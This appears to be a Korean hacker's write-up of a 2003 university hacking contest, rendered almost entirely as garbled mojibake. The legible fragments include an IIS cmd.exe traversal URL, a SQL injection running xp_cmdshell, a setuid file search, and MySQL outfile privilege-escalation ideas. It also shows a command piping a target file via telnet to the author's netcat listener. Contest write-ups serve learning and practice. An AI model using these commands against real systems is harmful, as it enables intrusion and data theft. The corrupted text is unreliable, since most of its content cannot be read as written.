¿ì¾ß²¿(±è¿ìÇö:wooyaggo@naver.com)ÀÇ ÀÎÇÏ´ë Ç®À̱â.. ÇÏÇÏÇÏ ¾È³çÇϼ¼¿ä.. ±è¿ìÇöÀÔ´Ï´Ù.. ÇöÀç ½Ç·ÂÀº Çϳªµµ ¾øÁö¸¸ ¿Í¿ìÄÚµå(Wowcode at Wowhacker)¶õ ¸íĪ¸¸ ´Þ°í ÀÖ´Â ÇÑ °íµîÇлýÀÔ´Ï´Ù. HSDµ¿È£È¸(http://hsd.hackerslab.org)¿¡¼­µµ ¸¹ÀÌ È°µ¿ÇÏ°í ÀÖ½À´Ï´Ù.^^ ÀÌ·¸°Ô.. ±ÛÀ» ¾²´Â°Íµµ ¿À·£¸¸ ÀΰŠ°°³×¿ä.. ¾îÁ¦ 2003³â 5¿ù 3ÀÏ¿¡ ÇÑ ÀÎÇÏ´ë ¿¹¼±,º»¼±¹®Á¦¿¡ °üÇؼ­ °£´ÜÇÑ »ðÁú±â¸¦ ÀûÀ»·Á°í ÇÕ´Ï´Ù.. ´ëȸ ¹®Á¦¸¦ Ç®ÀÌÇϽôø ºÐµé¿¡°Ô Á¶±ÝÀ̳ª¸¶ µµ¿òÀÌ ‰çÀ¸¸é ÇÕ´Ï´Ù. ¾öû °£´ÜÇÏ°Ô.. ±×¸®°í °´°ü½ÄÀº ³Ñ¾î°¡°í ÁÖ°ü½Ä¸¸ ´Ù·ç°Ú½À´Ï´Ù. ±×¸®°í Á¦ ÁÖ°üÀûÀÎ °ßÇظ¸ ›§±â¶§¹®¿¡ ´ëȸ ½ÇÁ¦»óȲ°ú ´Ù¸¥ ¸éµµ ÀÖÀ»¼ö ÀÖ½À´Ï´Ù. º»¼±Àº Á¦°¡ º»¼± ´ä¾ÈÁö¿¡ Àû¾î ³½°ÍÀÔ´Ï´Ù.^^ Âü°í·Î ¿ÀŸ¿Í ÀÌ»óÇÑ ¹®¹ýµéÀÌ ³­¹«ÇÏ´Ï ¸¹Àº ¾çÇظ¦ ¹Ù¶ø´Ï´Ù.^^ 1-1 ¿¹¼± ·¹º§ 1 °´°ü½ÄÀº ³Ñ¾î°¡°í ÁÖ°ü½ÄÀ¸·Î ÇÏ°Ú½À´Ï´Ù. ¹®Á¦´Â PDA·Î Á¢¼ÓÇÑ°Í Ã³·³ º¸ÀÌ°Ô Ç϶ó.. ¿´´Âµ¥¿ä. Àú°°Àº °æ¿ì´Â User-Agent°ªÀ» º¯Á¶½ÃÄѼ­ ¼º°øÇß½À´Ï´Ù. ÇÏÁö¸¸ PDA·Î Á÷Á¢ Á¢¼ÓÇÏ´Â ¹æ¹ýµµ ÀÖÁÒ. User_Agent´Â ´ëÇü »çÀÌÆ® Agent·Î±× ³²±â´Â°÷ Àִµ¥ °Å±â¼­ ÂüÁ¶ ÇÏ½Ã¸é µË´Ï´Ù. °£´ÜÇÏ°Ô À©µµ¿ì ÇùÖÀ¸·Î Â¥¼­ ÇÏ½Ã¸é ¹Ù·Î ³ª¿É´Ï´Ù. ±×·±µ¥ Àú °°Àº °æ¿ì´Â óÀ½ ¸®´ª¿¡¼­ nc·Î 80¹ø port¿¡ Á¢¼ÓÇؼ­ ³¯·È´Âµ¥ ÀÌ»óÇÏ°Ô Ãâ·ÂµÇ´õ¶ó±¸¿ä. ÀÎÄÚµù ¹®Á¦ÀÎÁö.. ±×·¡¼­ pbi12(http://linuxnew.com)´ÔÀÇ ÇØ´õ Á¶À۱⸦ ÀÌ¿ëÇß½À´Ï´Ù. ÀÌ ÀÚ¸®¸¦ ºô·Á¼­ °¨»çµå¸³´Ï´Ù. ¾ÏÈ£´Â t¾î¼±¸¿´´ø°Í °°½À´Ï´Ù. 1-2 ¿¹¼± ·¹º§ 2 ·¹º§2´Â nt ¹ö±× ½ºÄɳʰ¡ ÀÖÀ¸¸é °£´ÜÇÏ°Ô Ç®¸± ¹®Á¦ ¿´³×¿ä.. ¾î·Æ°Ô »ý°¢Çؼ­.. http://ip/winnt/system32/cmd.exe?/c+¸í·É¾î Àú °°Àº °æ¿ì´Â ¼­¹ö logºÎºÐ¿¡¼­ cmd.exe¸¸ °Ë»öÇؼ­ ³ª¿Â°Å ´ëÀÔÇß´õ´Ï ÂÒ¸£¸£ ³ª¿Ô½À´Ï´Ù. ·¹º§2µµ »ç»ÓÈ÷.. 1-3 ¿¹¼± ·¹º§ 3 À̾߱⸦ ¸¹ÀÌ ÇؾߵɰŠ°°³×¿ä.. ·ÎÄù®Á¦ÀÔ´Ï´Ù. ¼­¹ö ip id/pass±îÁö ÁÖ¾îÁö±¸¿ä. ¼ÖÁ÷È÷ ÀÌ ¹®Á¦ ¾î·Æ½À´Ï´Ù. mysqlÀ» Æ©Å丮¾óÀ» Å뵶ÇÑ ºÐµé ¾Æ´Ï¸é¿ä. ±×·¡¼­ Àú´Â ¸øÇ®¾ú½À´Ï´Ù. ÀÌ ¹®Á¦´Â ÈùÆ®°¡ shadowÀ¸·Î ³ª¿À±â ¶§¹®¿¡ Å©·¢Çؼ­ Ǫ´Â °ÍÀÌÁÒ..^^; ¼­¹ö¿¡¼­ º¸¸é mysqld¸¸ level3À¸·Î µ¹¾Æ°©´Ï´Ù. suid°É¸° ÆÄÀÏÀº Çϳªµµ ¾øÁÒ. outfileÀº µË´Ï´Ù.. ¹Ø¿¡´Â Á¦°¡ »ý°¢ÇØ º»°ÍµéÀÔ´Ï´Ù. 1. bash°ü·Ã ÆÄÀÏ overwrite 2. LOAD¹®À» ÀÌ¿ëÇؼ­ infile 3. .my.cnf·Î datadirº¯Á¶ -> .sshµð·º »ý¼º -> ÀÎÁõÅ°¸¦ ÀÌ¿ëÇØ ssh·Î±×ÀÎ 1¹ø°´Â ±âÁ¸¿¡ Á¸ÀçÇÏ°í À־ oufile·Î µ¤¾î¾²Áö ¸øÇؼ­ ½ÇÆÐÇß±¸¿ä 2¹ø°´Â other¿¡ read±ÇÇÑÀÌ ÀÖ¾î¾ßÁö.. infileÀÌ µÇ³×¿ä^^; ±×¸®°í 3¹ø°´Â.. mysql¿¡¼­ .ÀÌ µé¾î°¡¸é ¹«Á¶°Ç ¾ÊµÇ³×¿ä.. ±×·¡¼­ ½ÇÆÐ.. ±×¸®°í ¿©·¯°¡Áö¸¦ »ðÁúÇßÁö¸¸.. ½ÇÆÐ.. ±×¸®°í ´ëȸ Áß°£¿¡ ¾î¶²±ÇÇÑÀ¸·Î º¸ÀÌ´Â ¹éµµ¾î°¡ ¿­·È´Âµ¥¿ä.. ±× ºñ¹ÐÀº... ½º½º·Î Çؼ®ÇϽñæ.. :) ±×¸®°í À̹ø ´ëȸ¿¡¼­ À߸øµÈÁ¤º¸¸¦ ÁֽŰÍ.. ¸¹ÀÌ Çì¸Ì½À´Ï´Ù. 1. level2 ipÁÖ¼Ò°¡ óÀ½¿¡ ¾ø¾úÀ½. -> ´ëȸ¼­¹ö °ø·«ÀÎÁÙ ¾Ë¾Ò½À´Ï´Ù. 2. level3 ·ÎÄà Á¢¼Ó Å©·¢ÇÑ ¾ÏÈ£ moralÀÌ Á¢¼ÓÀÌ ¾ÈµÇ¼­ ¸î¹øÀÌ°í ´Ù½ÃÇؾßÁö ‰ç¾ú´Ù´Â.. À߸øÇÏ¸é ¸øÇ®»· Çß½À´Ï´Ù. ÀÌ°É·Î ¿¹¼± °ø·«À» ¸¶Ä¡°Ú½À´Ï´Ù. ps. ¿¹¼± ·¹º§3¿¡¼­ ³­ÀÌÁ¶ Á¶Àý¿¡.. Á» Çì¸Ì½À´Ï´Ù. °ü¸®ÀÚÀÇ ÁøÁ¤ÇÑ Àǵµ°¡ ¹ºÁö.. ¾Æ¸¶ cron¿¡ w°¡ ºÙ¾îÀÖ¾ú´Âµ¥ ¾ø¿¡½Å°Í °°Àº.. »ý°¢ÀÌ µå³×¿ä.. ¹®µæ.. ÀÌÁ¦ ¾ß²¿ÀÇ Áß°£°í»ç 12½Ã¿¡ ¿­Â÷Ÿ°í ¼­¿ï¿ª¿¡¼­ ÁöÇÏö Ÿ°í.. PC¹æ¿¡ Çѽð£ ÀÖ´Ù°¡ ¹ö½º¸¦ Ÿ°í ÀÎÇÏ´ë °¬´õ´Ï ¸¹Àº ºÐµéÀÌ °è½Ãµ¥¿ä.. ±×·¯¸é ÀÌÁ¦ ¹®Á¦ Ç®À̸¦.. 2-1 º»¼± ·¹º§ 1 ÀÌ ¹®Á¦´Â.. ¾îµð¼±°¡ ³¸ÀÌ À;ú½À´Ï´Ù. ÈùÆ®°¡ »çÀüphp°¡ Àִµ¥ °Å±â¼­ Ãë¾àÁ¡À» ¹ß°ßÇ϶ó´Â °Å¿´ÁÒ. phpschool¿¡ ÀÖ¾ú´ø°Í °°Àºµ¥.. ±×¶§ º¼¶§´Â ;¸¦ ÀÌ¿ëÇÑ°Í °°Àºµ¥.. À̹ø¹®Á¦¿¡¼­´Â |¸¦ ÀÌ¿ëÇÑ°ÍÀ̾ú³×¿ä..^^ º¸ÀÚ¸¶ÀÚ Ç®¾úÁÒ.. ÀÌ·±°Å´Â »¡¶ó¼­.. find / -name -perm -4000 2>/dev/null ÇϽøé xtermÇÏ°í su°¡ ¶ß´øµ¥.. ¿Ö xtermÀÌ ¶¸´ÂÁö.. ÀÌÇØ°¡ ¾ÊµÇµ¥¿ä..^^; xtermÀÌ¿ëÇؼ­ rootȹµæÇ϶ó´Â ÀÇ¿ÜÀÇ ¹®Á¦°¡ ÀÖ¾úÀ»Áöµµ.. 2-2 º»¼± ·¹º§ 2 ÀÌ ¹®Á¦´Â °¡ÀÔÇÒ¶§ ¾²´Â ¿ìÆí ¹øÈ£ °Ë»ö ¿£Áø¿¡¼­ sql injectionÀÌ ¹ß»ýÇϴ°̴ϴÙ. ¸· µ¿ ÀÔ·ÂÇ϶ó°í ¶ã¶§¿ä..^^; ¸ÇóÀ½ a'-- Çϴϱî sql¹®ÀÌ Àüü°¡ ÂÓ ¶°¼­ ¼ø°£ ´çȲ.. È®ÀåÀÚ°¡ asp°í Çؼ­ nt´Ï±î xp_cmdshellÀ» ÀÌ¿ëÇÏ¸é µÇ°Ú´Ù°í ÆÅ »ý°¢ÀÌ ¶°¿À¸§. ±×·±µ¥ ¹®Á¦´Â °øÁö´Â ºÐ¸í ·¹º§2¼­¹ö°¡ ¸®´ª½º¶ó°íÇÏ°í¼± À©µµ¿ì¹®Á¦¸¦ ³»´Ù´Ï.. ÀÌ°Ç Á» ³Ê¹« ¾Æ½¬¿ü½À´Ï´Ù... ¿¹¼± ¶§µµ ±×·¯°í.. ±×·¸´Ù°í µû·Î °øÁöµµ ¾ÊÇØÁÖ°í.. ±×·¡¼­ À¯´Ð½º °è¿­ ÇØÅ· °øºÎÇϽźеéÀº ¿ÏÀü °ø»ð¸¸ ÆĽŰÅÁÒ.. ¤Ñ¤Ñ; Á¦¼­¹ö¿¡ sniffer(spynetÀ» »ç¿ëÇß½À´Ï´Ù. optionÀº direct·Î ÁÖ±¸¿ä ±×·¯¸é Àڽſ¡°Ô¸¸ ³¯¶ó¿À´Â°Í¸¸ º¸¿©ÁÖÁÒ.) a'; EXEC master..xp_cmdshell 'ping ³»¼­¹ö'-- -> ¿©±â±îÁö ¿À±â ¸¹Àº ½Ã°£À» ¼ÒºñÇß½À´Ï´Ù.. ¤Ð.¤Ì °Ë»ö¿£Áøµµ ¾ÊµÇ°í Çؼ­¿ä.. Çϸé pingÀÌ ³¯¶ó¿Â´Ù´Â °ÍÀ» ¾Ë¾Ò½À´Ï´Ù. Áï pingÀÌ Á¦´ë·Î ½ÇÇà‰ç°í ÀÓÀÇÀÇ ¸í·É¾î¸¦ ½ÇÇà½Ãų¼ö Àִٴ°ÍÀÌÁÒ. ÇÏÁö¸¸ ¾Æ½±°Ôµµ À¥¿¡¼­ °á°ú°ªÀ» º¸Áö´Â ¸øÇß½À´Ï´Ù. ±×·¡¼­ Àú´Â ¿©·¯°¡Áö »ý°¢À» ÇغýÀ´Ï´Ù. 1. netÀÀ¿ë 2. tftpÀÀ¿ë 3. ncÀÀ¿ë + telnet ÀÀ¿ë -> ³ªÁß¿¡ nc°¡ ÈùÆ®·Î ³ª¿Àµ¥¿ä.. 4. copy ÀÀ¿ë 1¹ø¿¡¼­´Â net send, net file¿É¼ÇÀ» ÀÌ¿ëÇÒ·Á°í Çß½À´Ï´Ù¸¸ ½ÇÆÐÇß½À´Ï´Ù. Á¦°¡ À©µµ¿ì ¸í·É¾î¸¦ Àß ¾ËÁö ¸øÇ߱⠶§¹®ÀÌÁÒ.. ¿©±â¼­ ½Ã°£ÀÌ ²Ï °É·È½À´Ï´Ù. 2¹ø¿¡´Â È®½ÇÇÑ Ç®ÀÌ ´äÀÌ ¿´Áö¸¸ tftpd°¡ ¾ø¾î¼­ ÆÄÀÏÀ» ¸ø¹Þ¾Ò´Ù´Â.. ²Ï ¾ï¿ïÇß½À´Ï´Ù. sniffer·Î º¸¸é ÆÄÀÏÀÌ ³¯¶ó¿À´Âµ¥ tftpd°¡ ¾ø¾î¼­ ¸ø¹Þ´Â.. ½ÃÇè ´äÀ» ¾Æ´Âµ¥ ½Ç¼ö·Î Ʋ·ÈÀ»¶§ ±âºÐÀ» ¶°¿Ã¸®½Ã¸é µÉ°Ì´Ï´Ù. ÀÌ ¹æ¹ýÀº Ç®ÀÌ´Â µÇÁö¸¸ ¾Æ½±°Ôµµ tftpd°¡ ¾ø¾î¼­ ½ÇÆÐ Çß½À´Ï´Ù. (Àü tftpd°¡ ±âº»ÀûÀ¸·Î ´Ù ¼³Ä¡ µÇ ÀÖ´ÂÁÙ ¾Ë¾Ò½À´Ï´Ù.. ¤Ð.¤Ì) 4. copyÀÀ¿ë copy c:\level2\level2.txt c:\Inetpub\wwwroot Çߴµ¥.. ¾ÊµÇµ¥¿ä..^^; °æ·Î¹®Á¦ÀÎÁö ±ÇÇÑ ¹®Á¦ÀÎÁö.. 2¹ø°·Î ½ÃµµÇÑ ¹æ¹ý.. 3¹øÀº ncÇÏ°í telnet ÀÔ´Ï´Ù. ¿©·¯°¡Áö ¹æ¹ýÀ» Çß½À´Ï´Ù. ¸¶Áö¸·¿¡ ¸»ÀÌÁÒ Ã³À½ ½ÃµµÇß´ø°Ô nc.exe¸¦ level2¼­¹ö¿¡¼­ ¹Þ´Â ¹æ¹ýÀ» °­±¸ÇßÁö¸¸ À©µµ¿ì¿¡ ´ëÇÑ Áö½Ä ºÎÁ·À¸·Î ½ÇÆÐ.(¿©±â¼­µµ ½Ã°£ ¸¹ÀÌ Áöü) µÎ¹ø°´Â cmd.exeÇÏ°í telnetÀ» ÀÌ¿ëÇؼ­ ¸®´ÙÀÌ·º¼ÇÀ¸·Î ½©À» ¶³¾î¶ß·Áº¼ ¹æ¹ýÀ» °­±¸ÇßÁö¸¸ Ä¿³Ø¼Ç Á¢¼ÓµÇ°í ¹Ù·Î Á¢¼Ó ²÷±è.. -> ½ÇÆÐ nc -vv -l -p port·Î Æ÷Æ®¸¦ ¿­°í type c:\level2\level2.txt|telnet ³»ip nc¿­¸°Æ÷Æ® ¸¦ ÇßÀ¸³ª Ä¿³Ø¼Ç¸¸ ¿À°í Á¤ÀÛ ³»¿ëÀº ¾Ê¿À´Â.. ¤Ð.¤Ì -> ½ÇÆÐ(¸¸¾à mfc¸¦ ÇÒÁÙ ¾Ë¾Ò´Ù¸é ´ëÃæ telnet¼­¹ö¸¦ ±¸¼ºÇؼ­ ¹Þ¾Ò´Ù¸é Ä¿³Ø¼Çµµ Á¦´ë·Î ¿À°í ¾ÏÈ£µµ ¹Þ¾ÒÀ» °Å¶ó°í »ý°¢ÇÕ´Ï´Ù.) ¿©±â±îÁö ÇÏ°í ¹Ì·Ã ¾øÀÌ ¹Ù·Î ´ä¾ÈÁö¸¦ ÀÛ¼ºÇß½À´Ï´Ù.. ÇÏÁö¸¸ Á¦°¡ ¸î°¡Áö Áß¿äÇÑ ºÎºÐÀ» ºüÆ®¸°°ÍÀÌ À־ ÀÌ·¸°Ô Àû¾îº¾´Ï´Ù.^^ ps. ¾Æ´ÂÇü²²¼­ net shereÀ» ÀÌ¿ëÇØ °øÀ¯¸¦ ½ÃŲ´ÙÀ½¿¡ ÇÏ¸é ¾î¶»°Ú³Ä°í Çϼ̴µ¥¿ä.. ±×·±¹æ¹ýµµ ½ÃµµÇßÀ¸¸é ÁÁ¾ÒÀ»°Í °°´Ù´Â..(¹ØÁ®¾ß º»ÀüÀ̴ϱî¿ä..^^;) 2-3. º»¼± ·¹º§3 ·¹º§3Àº ½Ãµµµµ ¸øÇß½À´Ï´Ù.^^; ÇßÀ¸¸é ÇØÄð ¹®Á¦¸¦ º¸½ÅºÐÀº Ç®¼ö ÀÖ¾ú´ø ³­À̵µ °°Àº µ¥¿ä.. ÀÌ»ó ´ëȸ °ø·« »ðÁú±â¸¦ ¸¶Ä¡°Ú½À´Ï´Ù. À̹ø´ëȸ¸¦ ÅëÇؼ­ ¸¹Àº °í¼ö´ÔµéÀÇ ½Ç·ÂÀ» ±¸°æÇÒ¼ö À־ ÁÁÀº ±âȸ°¡ µÈ°Í °°½À´Ï´Ù.. ´ÙÀ½¿¡ ¶Ç ºÉ¼ö ÀÖ¾úÀ¸¸é ÁÁ°Ú±¸¿ä..^^ °ü¸®ÀÚ´Ô ±×¸®°í tftpdÁ» ¿Ã·ÁÁÖ¼ÌÀ¸¸é ¾Ê‰çÀ»±î¿ä.. ¤Ð.¤Ì ÈæÈæ